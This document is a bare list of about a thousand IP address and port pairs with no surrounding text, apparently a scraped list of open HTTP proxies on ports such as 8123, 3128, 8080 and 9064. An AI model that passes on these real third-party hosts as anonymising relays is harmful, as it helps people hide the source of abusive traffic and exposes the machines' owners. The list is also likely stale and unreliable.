117.175.226.199:8123 117.175.227.143:8123 117.175.227.147:8123 117.175.227.242:8123 117.175.227.7:8123 117.175.229.154:8123 117.175.229.192:8123 117.175.229.242:8123 117.175.229.4:8123 117.175.230.125:8123 117.175.230.19:8123 117.175.230.212:8123 117.175.230.224:8123 117.175.231.103:8123 117.175.231.48:8123 117.175.231.5:8123 117.175.232.109:8123 117.175.232.240:8123 117.175.232.76:8123 117.175.237.90:8123 117.175.238.85:8123 117.175.241.119:8123 117.175.241.37:8123 117.175.242.114:8123 117.175.242.213:8123 117.175.243.178:8123 117.175.243.186:8123 117.175.243.21:8123 117.175.243.42:8123 117.175.243.49:8123 117.175.243.73:8123 117.175.33.55:8123 117.175.33.73:8123 117.175.34.213:8123 117.175.34.3:8123 117.175.35.142:8123 117.175.37.106:8123 117.175.37.33:8123 117.175.37.57:8123 117.175.39.170:8123 117.175.39.198:8123 117.175.39.4:8123 117.175.45.136:8123 117.175.48.80:8123 117.175.49.37:8123 117.175.52.81:8123 117.175.60.135:8123 117.175.60.74:8123 117.175.62.182:8123 117.175.9.217:8123 117.175.99.182:8123 117.176.105.218:8123 117.176.11.220:8123 117.176.11.243:8123 117.176.110.187:8123 117.176.110.69:8123 117.176.110.90:8123 117.176.164.18:8123 117.176.165.177:8123 117.176.185.128:8123 117.176.185.220:8123 117.176.185.36:8123 117.176.188.128:8123 117.176.189.231:8123 117.176.189.47:8123 117.176.189.48:8123 117.176.189.90:8123 117.176.191.10:8123 117.176.191.142:8123 117.176.191.160:8123 117.176.191.213:8123 117.176.191.234:8123 117.176.2.251:8123 117.176.221.107:8123 117.176.221.63:8123 117.176.233.28:8123 117.176.28.49:8123 117.176.29.190:8123 117.176.29.250:8123 117.176.3.218:8123 117.176.32.224:8123 117.176.33.176:8123 117.176.4.137:8123 117.177.16.189:8123 117.177.161.37:8123 117.177.164.147:8123 117.177.166.27:8123 117.177.167.119:8123 117.177.167.70:8123 117.177.170.110:8123 117.177.170.26:8123 117.177.171.165:8123 117.177.171.87:8123 117.177.172.129:8123 117.177.172.193:8123 117.177.172.228:8123 117.177.174.231:8123 117.177.174.30:8123 117.177.174.59:8123 117.177.232.218:8123 117.177.232.60:8123 117.177.240.43:80 117.177.28.217:8123 117.177.44.125:8123 117.177.44.229:8123 117.177.45.101:8123 117.177.45.193:8123 117.177.45.209:8123 117.177.46.4:8123 117.194.194.28:9064 117.200.34.222:9064 117.201.97.47:9064 117.203.144.56:9064 117.203.253.139:9064 117.205.18.128:9064 117.208.244.165:9064 117.208.63.137:9064 117.215.230.243:9064 117.220.248.233:9064 117.239.2.116:3128 117.27.157.111:8081 117.7.149.96:9064 118.126.142.209:3128 118.136.50.28:9064 118.144.151.145:3128 118.144.50.254:3128 118.161.11.27:9064 118.161.194.55:9064 118.166.215.68:9064 118.167.142.135:9064 118.169.115.219:9064 118.169.51.133:9064 118.170.37.94:9064 118.170.54.161:9064 118.171.112.66:9064 118.171.117.84:9064 118.69.202.73:3128 118.97.131.58:9064 118.97.30.178:3128 119.40.98.26:8080 119.80.160.50:80 119.80.86.128:8080 119.81.148.196:3128 119.90.127.4:80 119.97.164.48:8085 120.131.128.214:80 120.131.128.215:80 120.131.70.216:3128 120.197.234.166:80 120.197.53.195:8080 120.199.241.115:8123 120.199.243.15:8123 120.199.246.103:8123 120.199.249.219:8123 120.202.249.230:80 120.203.153.153:8123 120.203.161.239:8123 120.203.161.8:8123 120.203.162.91:8123 120.203.165.188:8123 120.203.233.179:8123 120.203.239.162:8123 120.206.104.18:8123 120.206.133.130:8123 120.206.136.110:8123 120.206.137.207:8123 120.206.142.199:8123 120.206.143.124:8123 120.206.144.132:8123 120.206.146.113:8123 120.206.150.61:8123 120.206.150.67:8123 120.206.169.19:8123 120.206.177.17:8123 120.206.182.49:8123 120.206.183.149:8123 120.206.185.132:8123 120.206.185.26:8123 120.206.187.101:8123 120.206.187.77:8123 120.206.196.112:8123 120.206.196.59:8123 120.206.196.85:8123 120.206.197.179:8123 120.206.214.161:8123 120.206.228.196:8123 120.206.72.134:8123 120.206.72.153:8123 120.206.72.206:8123 120.206.73.150:8123 120.206.73.18:8123 120.206.73.87:8123 120.206.76.117:8123 120.206.78.235:8123 120.24.216.244:80 120.27.51.123:8888 120.27.54.137:3128 120.83.5.164:18000 121.207.252.105:3128 121.21.60.138:8118 121.31.202.65:80 122.118.165.57:9064 122.118.176.237:9064 122.121.108.242:9064 123.0.45.124:9064 123.125.19.44:80 123.127.237.162:80 123.190.46.20:8080 124.11.174.202:9064 124.125.29.156:9064 124.155.246.122:9064 124.161.94.8:80 124.192.148.14:8080 124.207.175.91:8080 124.248.177.17:8080 124.248.184.119:80 124.248.184.119:8080 124.6.135.170:3128 124.95.163.102:80 125.164.137.222:8080 125.164.64.190:8080 125.230.60.31:9064 125.38.11.123:8118 125.39.66.66:80 125.39.66.67:80 125.39.66.68:80 125.39.66.69:80 125.63.97.164:9064 125.92.173.93:8118 131.221.114.163:9064 134.119.24.44:3128 138.91.248.44:3128 139.193.191.35:9064 14.153.224.17:9999 14.96.64.236:9064 14.96.92.27:9064 14.99.149.123:9064 14.99.18.70:9064 140.120.90.81:9064 141.105.164.239:8080 143.89.225.246:3128 150.187.5.100:8080 159.8.36.242:3128 162.246.23.9:3128 163.125.159.250:9999 163.125.199.14:8888 163.142.72.17:8080 164.138.237.254:80 165.24.10.16:8080 166.78.162.23:3128 175.138.47.185:8080 177.102.5.170:9064 177.103.27.135:9064 177.131.53.105:8080 177.137.108.135:9064 177.142.118.227:8080 177.180.248.163:9064 177.183.225.28:9064 177.206.43.197:8080 177.22.111.113:3128 177.36.214.222:8080 177.82.27.139:9064 177.99.164.162:8080 178.62.184.237:3128 179.171.53.31:9064 179.192.121.62:8080 179.213.190.184:9064 179.218.251.74:8080 179.235.187.39:9064 179.244.251.72:9064 179.56.81.148:9064 179.57.70.128:9064 180.247.133.59:8080 180.248.75.34:8080 180.253.148.206:8080 180.254.252.51:8080 180.254.92.222:8080 180.76.146.12:3128 181.208.101.216:9064 181.225.60.174:8080 181.225.61.64:8080 181.225.61.65:8080 181.49.15.162:3128 181.49.15.166:3128 181.61.196.57:3128 181.74.166.4:9064 182.109.92.183:8123 182.135.64.132:63000 182.234.130.104:9064 182.234.240.247:9064 182.253.121.243:8080 182.253.32.108:8080 182.253.73.115:8080 182.74.34.134:8080 183.129.194.87:3128 183.188.17.90:8118 183.203.22.182:80 183.203.22.183:80 183.203.22.184:80 183.203.22.185:80 183.206.71.177:8123 183.206.71.27:8123 183.206.73.62:8123 183.206.74.161:8123 183.206.74.253:8123 183.206.76.130:8123 183.206.87.85:8123 183.207.232.119:8080 183.207.232.193:8080 183.207.232.194:8080 183.208.185.94:8123 183.208.202.212:8123 183.208.214.200:8123 183.208.217.38:8123 183.208.222.143:8123 183.208.32.165:8123 183.208.37.218:8123 183.208.59.239:8123 183.209.107.19:8123 183.209.107.212:8123 183.209.16.240:8123 183.209.187.72:8123 183.209.231.11:8123 183.209.233.23:8118 183.209.236.220:8123 183.209.236.82:8123 183.210.0.10:8123 183.210.0.172:8123 183.210.1.59:8123 183.210.251.145:8123 183.210.253.98:8123 183.210.9.173:8123 183.211.1.220:8123 183.211.124.98:8123 183.211.13.20:8123 183.211.152.94:8123 183.211.153.57:8123 183.211.70.177:8123 183.211.73.120:8123 183.211.74.187:8123 183.211.77.103:8123 183.212.113.225:8123 183.212.114.163:8123 183.212.12.247:8123 183.212.123.227:8123 183.212.143.62:8123 183.212.153.84:8123 183.212.154.168:8123 183.212.67.153:8123 183.213.147.41:8123 183.213.159.192:8123 183.216.106.1:8123 183.216.127.168:8123 183.216.161.157:8123 183.216.163.172:8123 183.216.163.93:8123 183.216.164.238:8123 183.216.164.53:8123 183.216.165.205:8123 183.216.165.84:8123 183.216.166.78:8123 183.216.170.72:8123 183.216.171.225:8123 183.216.172.121:8123 183.216.175.42:8123 183.216.176.134:8123 183.216.176.163:8123 183.216.178.202:8123 183.216.185.116:8123 183.216.185.186:8123 183.216.187.16:8123 183.216.187.39:8123 183.216.187.44:8123 183.216.188.209:8123 183.216.225.2:8123 183.216.228.250:8123 183.216.239.171:8123 183.216.239.18:8123 183.216.239.45:8123 183.216.240.180:8123 183.216.243.2:8123 183.216.244.234:8123 183.216.245.45:8123 183.216.248.27:8123 183.216.248.28:8123 183.216.249.142:8123 183.216.251.24:8123 183.216.252.232:8123 183.216.99.71:8123 183.217.103.158:8123 183.217.137.233:8123 183.217.176.20:8123 183.217.187.2:8123 183.217.188.201:8123 183.217.188.93:8123 183.217.195.108:8123 183.217.197.167:8123 183.217.198.159:8123 183.217.207.191:8123 183.217.228.23:8123 183.217.228.42:8123 183.217.232.112:8123 183.217.243.14:8123 183.217.243.21:8123 183.217.31.206:8123 183.217.66.91:8123 183.218.106.154:8123 183.218.127.164:8123 183.218.13.175:8123 183.218.13.85:8123 183.218.71.97:8123 183.218.86.238:8123 183.218.86.239:8123 183.218.87.70:8123 183.219.102.248:8123 183.219.102.46:8123 183.219.138.73:8123 183.219.139.207:8123 183.219.140.140:8123 183.219.146.105:8123 183.219.147.192:8123 183.219.150.119:8123 183.219.150.175:8123 183.219.152.217:8123 183.219.154.250:8123 183.219.155.196:8123 183.219.156.124:8123 183.219.157.176:8123 183.219.158.49:8123 183.219.160.95:8123 183.219.163.70:8123 183.219.168.128:8123 183.219.174.142:8123 183.219.248.92:8123 183.219.27.26:8123 183.219.28.110:8123 183.219.3.106:8123 183.219.3.157:8123 183.219.3.210:8123 183.219.30.172:8123 183.219.30.204:8123 183.219.32.32:8123 183.219.4.231:8123 183.219.46.154:8123 183.219.50.52:8123 183.219.50.58:8123 183.219.52.85:8123 183.219.55.106:8123 183.219.58.241:8123 183.219.59.114:8123 183.219.59.21:8123 183.219.84.50:8123 183.219.91.227:8123 183.219.91.97:8123 183.219.92.230:8123 183.219.92.30:8123 183.219.93.196:8123 183.219.93.77:8123 183.219.94.245:8123 183.219.94.253:8123 183.22.244.181:9999 183.220.134.12:8123 183.220.157.161:8123 183.220.157.198:8123 183.220.159.60:8123 183.220.161.43:8123 183.220.172.206:8123 183.220.172.233:8123 183.220.172.38:8123 183.220.172.60:8123 183.220.172.62:8123 183.220.192.35:8123 183.220.199.98:8123 183.220.228.55:8123 183.220.228.9:8123 183.220.230.230:8123 183.220.234.232:8123 183.220.234.233:8123 183.220.234.32:8123 183.220.237.164:8123 183.220.240.109:8123 183.220.240.9:8123 183.220.241.103:8123 183.220.244.115:8123 183.220.244.138:8123 183.220.244.17:8123 183.220.244.54:8123 183.220.245.151:8123 183.220.245.159:8123 183.220.245.243:8123 183.220.245.89:8123 183.220.246.241:8123 183.220.247.22:8123 183.220.40.155:8123 183.220.44.84:8123 183.220.45.33:8123 183.220.45.52:8123 183.220.46.103:8123 183.220.46.190:8123 183.221.146.26:8123 183.221.147.172:8123 183.221.160.100:8123 183.221.160.198:8123 183.221.160.38:8123 183.221.162.113:8123 183.221.172.145:8123 183.221.185.107:8123 183.221.187.122:8123 183.221.187.6:8123 183.221.187.74:8123 183.221.190.112:8123 183.221.190.51:8123 183.221.217.221:8123 183.221.217.34:8123 183.221.220.29:8123 183.221.50.64:8123 183.221.53.94:8123 183.221.54.91:8123 183.222.101.251:8123 183.222.152.168:8123 183.222.152.202:8123 183.222.152.236:8123 183.222.152.42:8123 183.222.152.70:8123 183.222.152.90:8123 183.222.153.14:8123 183.222.153.145:8123 183.222.153.204:8123 183.222.153.207:8123 183.222.153.218:8123 183.222.153.54:8123 183.222.153.61:8123 183.222.153.8:8123 183.222.154.26:8123 183.222.154.48:8123 183.222.154.68:8123 183.222.154.77:8123 183.222.155.107:8123 183.222.155.19:8123 183.222.155.225:8123 183.222.155.69:8123 183.222.155.75:8123 183.222.156.12:8123 183.222.156.15:8123 183.222.156.150:8123 183.222.156.217:8123 183.222.156.53:8123 183.222.157.124:8123 183.222.157.154:8123 183.222.157.164:8123 183.222.157.231:8123 183.222.157.243:8123 183.222.157.3:8123 183.222.157.37:8123 183.222.157.47:8123 183.222.157.55:8123 183.222.158.119:8123 183.222.158.206:8123 183.222.158.224:8123 183.222.158.30:8123 183.222.158.44:8123 183.222.158.5:8123 183.222.158.65:8123 183.222.159.104:8123 183.222.159.208:8123 183.222.161.58:8123 183.222.164.82:8123 183.222.166.227:8123 183.222.171.117:8123 183.222.171.149:8123 183.222.171.215:8123 183.222.172.159:8123 183.222.172.238:8123 183.222.172.241:8123 183.222.173.114:8123 183.222.174.132:8123 183.222.176.53:8123 183.222.182.151:8123 183.222.182.155:8123 183.222.182.40:8123 183.222.183.120:8123 183.222.246.198:8123 183.222.246.219:8123 183.222.250.121:8123 183.222.250.169:8123 183.222.250.180:8123 183.222.250.181:8123 183.222.250.244:8123 183.222.250.253:8123 183.222.252.167:8123 183.222.252.243:8123 183.222.252.92:8123 183.222.254.31:8123 183.222.255.146:8123 183.222.255.21:8123 183.222.255.27:8123 183.222.64.163:8123 183.222.65.189:8123 183.222.72.198:8123 183.222.74.207:8123 183.222.75.185:8123 183.222.81.191:8123 183.222.86.183:8123 183.222.87.167:8123 183.222.96.148:8123 183.222.98.28:8123 183.223.10.142:8123 183.223.10.195:8123 183.223.10.50:8123 183.223.11.39:8123 183.223.12.20:8123 183.223.12.68:8123 183.223.13.192:8123 183.223.13.252:8123 183.223.15.197:8123 183.223.152.12:8123 183.223.153.247:8123 183.223.154.30:8123 183.223.157.198:8123 183.223.159.139:8123 183.223.16.202:8123 183.223.161.105:8123 183.223.166.123:8123 183.223.166.248:8123 183.223.167.85:8123 183.223.168.158:8123 183.223.168.167:8123 183.223.169.107:8123 183.223.169.159:8123 183.223.169.22:8123 183.223.170.8:8123 183.223.171.157:8123 183.223.172.202:8123 183.223.172.230:8123 183.223.173.133:8123 183.223.173.137:8123 183.223.173.182:8123 183.223.173.58:8123 183.223.174.252:8123 183.223.174.90:8123 183.223.18.141:8123 183.223.18.251:8123 183.223.184.115:8123 183.223.185.213:8123 183.223.19.186:8123 183.223.19.238:8123 183.223.192.161:8123 183.223.192.165:8123 183.223.192.205:8123 183.223.193.133:8123 183.223.193.158:8123 183.223.193.58:8123 183.223.194.225:8123 183.223.194.246:8123 183.223.194.91:8123 183.223.195.114:8123 183.223.195.126:8123 183.223.195.130:8123 183.223.195.166:8123 183.223.195.191:8123 183.223.196.165:8123 183.223.196.184:8123 183.223.197.197:8123 183.223.197.209:8123 183.223.197.253:8123 183.223.197.42:8123 183.223.198.16:8123 183.223.199.243:8123 183.223.200.114:8123 183.223.200.61:8123 183.223.200.74:8123 183.223.201.171:8123 183.223.201.188:8123 183.223.202.161:8123 183.223.202.71:8123 183.223.204.126:8123 183.223.204.13:8123 183.223.204.217:8123 183.223.204.26:8123 183.223.208.238:8123 183.223.209.205:8123 183.223.209.76:8123 183.223.21.162:8123 183.223.21.65:8123 183.223.211.34:8123 183.223.213.81:8123 183.223.215.210:8123 183.223.23.191:8123 183.223.23.56:8123 183.223.242.126:8123 183.223.242.168:8123 183.223.242.199:8123 183.223.242.227:8123 183.223.242.63:8123 183.223.243.202:8123 183.223.243.212:8123 183.223.30.132:8123 183.223.33.102:8123 183.223.33.12:8123 183.223.33.125:8123 183.223.34.154:8123 183.223.36.208:8123 183.223.36.99:8123 183.223.37.78:8123 183.223.40.11:8123 183.223.40.126:8123 183.223.40.241:8123 183.223.40.243:8123 183.223.41.161:8123 183.223.41.97:8123 183.223.9.177:8123 183.223.9.40:8123 183.223.9.98:8123 183.224.1.30:80 183.227.216.80:8123 183.227.217.139:8123 183.227.217.19:8123 183.227.219.83:8123 183.227.252.107:8123 183.227.252.137:8123 183.227.252.158:8123 183.227.26.41:8123 183.227.4.235:8123 183.228.10.196:8123 183.228.109.119:8123 183.228.109.23:8123 183.228.109.39:8123 183.228.11.204:8123 183.228.121.124:8123 183.228.121.171:8123 183.228.122.51:8123 183.228.123.214:8123 183.228.139.29:8123 183.228.156.148:8123 183.228.156.160:8123 183.228.156.6:8123 183.228.157.220:8123 183.228.169.109:8123 183.228.177.44:8123 183.228.178.162:8123 183.228.181.67:8123 183.228.182.152:8123 183.228.183.117:8123 183.228.192.176:8123 183.228.192.59:8123 183.228.196.207:8123 183.228.196.208:8123 183.228.196.4:8123 183.228.197.124:8123 183.228.197.55:8123 183.228.198.184:8123 183.228.198.39:8123 183.228.198.95:8123 183.228.199.175:8123 183.228.199.184:8123 183.228.199.187:8123 183.228.200.222:8123 183.228.201.146:8123 183.228.201.158:8123 183.228.201.174:8123 183.228.208.197:8123 183.228.209.129:8123 183.228.210.110:8123 183.228.216.164:8123 183.228.216.205:8123 183.228.217.10:8123 183.228.217.128:8123 183.228.220.86:8123 183.228.222.85:8123 183.228.223.113:8123 183.228.233.78:8123 183.228.236.91:8123 183.228.239.55:8123 183.228.240.212:8123 183.228.240.41:8123 183.228.246.161:8123 183.228.246.40:8123 183.228.250.153:8123 183.228.252.231:8123 183.228.34.90:8123 183.228.37.196:8123 183.228.38.107:8123 183.228.38.232:8123 183.228.38.236:8123 183.228.38.46:8123 183.228.39.184:8123 183.228.39.221:8123 183.228.39.36:8123 183.228.40.113:8123 183.228.40.123:8123 183.228.41.66:8123 183.228.42.168:8123 183.228.43.214:8123 183.228.43.46:8123 183.228.66.161:8123 183.228.69.139:8123 183.228.69.42:8123 183.228.71.227:8123 183.228.73.151:8123 183.228.73.179:8123 183.228.73.51:8123 183.228.74.239:8123 183.228.75.240:8123 183.228.78.120:8123 183.228.78.241:8123 183.228.78.45:8123 183.228.79.178:8123 183.228.79.179:8123 183.228.79.40:8123 183.228.88.199:8123 183.228.88.33:8123 183.228.89.166:8123 183.228.89.175:8123 183.228.89.37:8123 183.228.89.69:8123 183.228.9.190:8123 183.228.92.153:8123 183.228.92.201:8123 183.228.92.250:8123 183.228.92.52:8123 183.228.92.61:8123 183.228.92.66:8123 183.228.92.98:8123 183.228.93.105:8123 183.228.93.175:8123 183.228.93.45:8123 183.228.93.79:8123 183.228.94.139:8123 183.230.114.79:8123 183.230.53.49:8123 183.245.209.82:8123 183.245.212.153:8123 183.245.220.203:8123 183.247.240.60:8123 183.247.34.28:8123 183.247.34.78:8123 183.249.37.110:8123 183.249.45.208:8123 183.249.62.44:8123 183.249.8.196:8123 183.60.187.55:80 183.87.129.242:8080 183.90.160.114:8080 185.28.193.95:8080 185.30.147.197:8080 185.37.226.184:18080 185.37.226.184:19350 185.72.156.19:7808 186.14.113.80:8080 186.14.170.171:9064 186.14.247.90:8080 186.193.23.3:3128 186.193.27.73:3128 186.214.149.126:8080 186.25.44.159:8080 186.28.239.156:9064 186.36.19.134:9064 186.88.100.177:8080 186.88.103.81:9064 186.88.161.198:9064 186.88.165.222:9064 186.88.170.20:8080 186.88.171.41:8080 186.88.224.71:8080 186.88.240.100:9064 186.88.244.153:8080 186.88.245.237:8080 186.88.42.217:9064 186.88.98.65:9064 186.89.125.206:9064 186.89.134.71:8080 186.89.151.101:9064 186.89.159.11:8080 186.89.160.85:8080 186.89.178.197:9064 186.89.181.236:8080 186.89.187.155:8080 186.89.196.220:8080 186.89.221.208:9064 186.89.222.74:8080 186.89.255.32:8080 186.89.7.54:8080 186.89.70.178:9064 186.89.87.57:8080 186.89.95.67:9064 186.90.113.146:9064 186.90.114.47:9064 186.90.121.242:8080 186.90.157.29:8080 186.90.22.90:8080 186.90.24.153:8080 186.90.31.85:9064 186.90.52.47:9064 186.90.65.167:8080 186.90.68.57:8080 186.90.85.70:8080 186.90.89.197:9064 186.90.91.91:8080 186.91.126.72:9064 186.91.185.128:8080 186.91.194.110:9064 186.91.222.229:9064 186.91.255.73:9064 186.91.64.115:8080 186.91.64.185:9064 186.91.70.17:8080 186.91.71.195:8080 186.91.73.88:8080 186.91.76.132:8080 186.91.94.244:8080 186.92.115.109:9064 186.92.118.241:8080 186.92.12.19:8080 186.92.123.67:9064 186.92.152.169:9064 186.92.163.27:8080 186.92.183.1:9064 186.92.189.73:8080 186.92.21.139:8080 186.92.212.153:9064 186.92.22.62:8080 186.92.230.178:9064 186.92.24.186:8080 186.92.240.228:8080 186.92.245.97:9064 186.92.249.97:8080 186.92.31.237:8080 186.92.38.108:8080 186.92.50.85:9064 186.92.55.115:9064 186.92.57.190:8080 186.92.60.144:9064 186.92.61.250:8080 186.92.7.102:8080 186.92.70.247:8080 186.92.83.55:8080 186.92.85.90:8080 186.92.87.41:9064 186.92.88.174:9064 186.92.90.29:8080 186.92.94.27:8080 186.92.99.175:8080 186.93.129.41:8080 186.93.141.114:8080 186.93.165.166:8080 186.93.174.46:8080 186.93.186.209:8080 186.93.193.41:8080 186.93.2.171:9064 186.93.204.210:8080 186.93.218.178:8080 186.93.226.108:9064 186.93.228.236:9064 186.93.229.112:9064 186.93.231.240:8080 186.93.234.216:9064 186.93.235.237:9064 186.93.31.160:9064 186.93.49.123:8080 186.93.49.221:8080 186.93.66.200:9064 186.93.73.13:9064 186.93.73.2:9064 186.93.89.209:9064 186.94.1.210:8080 186.94.102.81:9064 186.94.113.112:9064 186.94.130.7:9064 186.94.146.34:9064 186.94.148.100:9064 186.94.152.162:8080 186.94.156.219:9064 186.94.17.171:9064 186.94.179.72:9064 186.94.184.101:9064 186.94.185.230:9064 186.94.188.200:9064 186.94.19.233:8080 186.94.21.233:9064 186.94.25.141:9064 186.94.3.16:8080 186.94.30.68:8080 186.94.48.38:8080 186.94.57.76:8080 186.94.58.85:9064 186.94.60.31:8080 186.94.66.188:9064 186.94.80.163:9064 186.94.81.96:9064 186.95.12.105:9064 186.95.134.251:8080 186.95.137.11:9064 186.95.143.105:8080 186.95.149.38:8080 186.95.162.242:8080 186.95.176.146:8080 186.95.178.91:8080 186.95.197.31:8080 186.95.201.220:9064 186.95.206.13:9064 186.95.210.138:9064 186.95.213.251:8080 186.95.214.205:9064 186.95.214.60:9064 186.95.226.156:9064 186.95.226.26:9064 186.95.231.202:8080 186.95.243.244:8080 186.95.51.241:9064 186.95.65.181:9064 186.95.68.210:8080 186.95.68.84:9064 186.95.73.230:8080 186.95.75.242:8080 186.95.8.134:9064 186.95.86.21:8080 186.95.9.10:9064 187.16.38.186:3128 187.16.38.187:3128 187.16.38.188:3128 187.16.44.228:8080 187.5.38.130:8080 187.75.147.132:3128 188.137.99.6:3128 188.237.185.202:8080 189.1.12.163:8080 189.11.175.187:3128 189.14.65.162:8080 189.202.191.60:3128 189.28.237.73:9064 189.35.71.48:9064 189.39.98.174:9064 189.46.231.184:9064 189.81.151.108:8080 189.91.130.130:9064 190.121.148.242:8080 190.142.171.247:9064 190.142.219.159:9064 190.142.248.182:9064 190.151.125.155:8080 190.153.113.227:8080 190.153.38.152:8080 190.198.100.237:9064 190.198.102.68:8080 190.198.108.184:9064 190.198.112.6:9064 190.198.115.133:9064 190.198.117.36:9064 190.198.122.136:9064 190.198.133.176:8080 190.198.146.64:9064 190.198.147.171:8080 190.198.147.26:9064 190.198.152.78:9064 190.198.155.226:8080 190.198.157.34:9064 190.198.177.104:8080 190.198.178.131:9064 190.198.186.61:8080 190.198.209.95:9064 190.198.211.180:9064 190.198.217.24:9064 190.198.225.232:9064 190.198.230.115:9064 190.198.249.109:9064 190.198.249.43:8080 190.198.254.23:9064 190.198.29.198:9064 190.198.31.78:9064 190.198.32.124:9064 190.198.46.236:9064 190.198.5.78:9064 190.198.68.20:9064 190.198.68.84:9064 190.198.76.216:9064 190.198.83.39:9064 190.198.95.120:8080 190.198.97.151:9064 190.199.142.124:8080 190.199.164.57:9064 190.199.195.220:8080 190.199.229.62:8080 190.199.240.249:9064 190.199.250.178:9064 190.199.33.140:9064 190.199.37.65:8080 190.199.50.13:9064 190.199.51.167:8080 190.199.91.175:9064 190.200.135.232:9064 190.200.156.73:9064 190.200.159.211:8080 190.200.16.246:9064 190.200.181.144:8080 190.200.188.246:8080 190.200.248.149:9064 190.200.51.242:9064 190.201.0.124:8080 190.201.105.185:9064 190.201.106.45:8080 190.201.106.55:9064 190.201.133.254:8080 190.201.133.72:8080 190.201.138.106:8080 190.201.142.75:8080 190.201.15.213:8080 190.201.157.241:8080 190.201.198.151:8080 190.201.25.76:8080 190.201.3.160:8080 190.201.34.107:8080 190.201.7.115:8080 190.201.9.52:8080 190.201.96.29:8080 190.201.98.36:9064 190.202.216.106:8080 190.202.217.195:8080 190.202.217.99:8080 190.202.247.203:8080 190.202.250.66:8080 190.202.252.162:8080 190.202.254.216:8080 190.203.109.180:8080 190.203.110.165:9064 190.203.129.10:8080 190.203.129.140:8080 190.203.129.226:9064 190.203.138.20:9064 190.203.138.77:8080 190.203.141.92:8080 190.203.165.118:9064 190.203.175.215:9064 190.203.205.55:8080 190.203.207.107:8080 190.203.226.251:8080 190.203.237.163:8080 190.203.32.9:8080 190.203.35.147:8080 190.203.35.156:8080 190.203.35.20:8080 190.203.45.59:9064 190.203.71.249:9064 190.203.74.24:8080 190.203.97.92:9064 190.204.103.196:9064 190.204.115.204:8080 190.204.12.158:9064 190.204.128.92:9064 190.204.129.118:8080 190.204.132.205:8080 190.204.150.116:8080 190.204.150.122:8080 190.204.155.87:8080 190.204.164.119:8080 190.204.169.154:8080 190.204.2.71:9064 190.204.226.153:8080 190.204.228.123:9064 190.204.240.2:8080 190.204.249.219:8080 190.204.251.185:8080 190.204.26.84:9064 190.204.46.211:9064 190.204.50.66:8080 190.204.7.193:9064 190.204.76.76:8080 190.204.8.94:9064 190.204.91.29:8080 190.204.92.133:8080 190.204.98.35:8080 190.205.149.164:8080 190.205.18.72:8080 190.205.19.86:9064 190.205.20.181:8080 190.205.210.250:9064 190.205.240.14:8080 190.205.4.140:8080 190.205.5.100:8080 190.206.116.145:8080 190.206.12.98:9064 190.206.120.73:8080 190.206.126.63:8080 190.206.134.127:8080 190.206.161.144:8080 190.206.176.92:9064 190.206.200.85:8080 190.206.210.249:8080 190.206.214.111:8080 190.206.215.216:8080 190.206.217.212:8080 190.206.218.58:8080 190.206.241.43:8080 190.206.28.3:8080 190.206.52.85:8080 190.206.78.103:8080 190.206.85.148:8080 190.206.86.78:8080 190.207.0.131:8080 190.207.105.106:9064 190.207.110.80:9064 190.207.127.153:9064 190.207.180.35:8080 190.207.185.95:8080 190.207.45.199:8080 190.207.65.103:8080 190.234.157.128:8080 190.253.215.20:9064 190.36.23.243:8080 190.36.25.203:8080 190.36.29.36:8080 190.37.115.55:8080 190.37.233.211:8080 190.37.237.204:8080 190.37.44.135:9064 190.37.69.195:8080 190.38.191.249:8080 190.38.2.13:8080 190.38.209.220:9064 190.38.249.17:8080 190.38.32.92:9064 190.38.62.217:8080 190.38.82.150:8080 190.38.85.133:9064 190.38.90.21:8080 190.39.113.143:8080 190.39.118.111:9064 190.39.131.61:8080 190.39.141.249:8080 190.39.166.17:8080 190.39.193.212:8080 190.39.206.64:8080 190.39.238.246:8080 190.39.240.248:8080 190.39.243.49:8080 190.39.247.4:8080 190.39.46.230:8080 190.39.50.75:8080 190.52.32.126:3128 190.72.130.92:8080 190.72.14.145:8080 190.72.16.87:8080 190.72.17.92:8080 190.72.188.80:8080 190.72.236.71:9064 190.72.25.135:8080 190.72.34.202:8080 190.72.36.201:8080 190.72.49.42:8080 190.72.5.165:8080 190.72.5.82:8080 190.72.62.76:8080 190.73.100.59:8080 190.73.102.75:8080 190.73.104.206:8080 190.73.106.56:8080 190.73.107.108:8080 190.73.108.222:9064 190.73.143.208:8080 190.73.143.29:8080 190.73.161.188:8080 190.73.193.58:9064 190.73.211.179:9064 190.73.231.179:8080 190.73.231.4:8080 190.73.247.107:8080 190.73.40.150:8080 190.73.79.228:8080 190.74.117.193:9064 190.74.124.160:8080 190.74.182.19:8080 190.74.214.156:8080 190.74.59.131:8080 190.74.83.181:8080 190.74.93.28:8080 190.75.105.245:9064 190.75.118.35:8080 190.75.130.113:8080 190.75.42.115:9064 190.75.42.144:8080 190.75.46.172:8080 190.75.49.208:8080 190.75.53.3:8080 190.75.56.49:8080 190.75.72.128:8080 190.75.74.202:8080 190.75.90.149:8080 190.77.117.48:9064 190.77.125.240:8080 190.77.177.208:8080 190.77.18.167:8080 190.77.182.177:8080 190.77.19.75:8080 190.77.215.152:9064 190.77.217.205:8080 190.77.221.134:8080 190.77.230.139:8080 190.77.245.174:8080 190.77.250.126:8080 190.77.250.74:8080 190.77.26.84:8080 190.77.31.239:8080 190.77.40.31:8080 190.77.47.221:8080 190.77.88.94:8080 190.78.161.93:9064 190.78.168.246:9064 190.78.17.63:8080 190.78.172.112:8080 190.78.176.94:8080 190.78.191.98:8080 190.78.204.161:8080 190.78.21.180:8080 190.78.220.56:8080 190.78.48.245:8080 190.78.53.207:8080 190.78.58.2:8080 190.78.58.45:8080 190.78.63.191:8080 190.78.81.248:9064 190.78.86.220:8080 190.78.88.49:8080 190.79.21.146:8080 190.79.221.204:8080 190.79.24.174:8080 190.79.79.56:8080 190.79.8.20:8080 190.94.203.102:9064 192.119.246.210:3128 195.154.233.59:3128 195.175.42.102:8080 195.190.109.110:3128 195.246.54.7:8080 195.88.192.144:8080 197.161.221.144:8080 199.200.120.140:7808 199.200.120.140:8089 200.103.97.218:80 200.109.145.188:8080 200.109.152.249:8080 200.109.154.114:8080 200.109.35.44:8080 200.109.46.114:9064 200.115.63.195:9064 200.214.132.19:3128 200.222.96.218:8081 200.223.97.194:8080 200.44.253.114:8080 200.46.94.202:3128 200.84.134.22:9064 200.84.206.249:8080 200.84.39.126:8080 200.84.84.219:9064 200.90.78.52:9064 200.93.105.121:8080 200.93.118.121:9064 200.93.15.253:8080 201.208.137.199:8080 201.208.162.14:8080 201.208.183.114:9064 201.208.224.174:8080 201.208.227.182:8080 201.208.233.40:8080 201.208.37.160:9064 201.209.11.161:8080 201.209.193.206:9064 201.209.202.60:9064 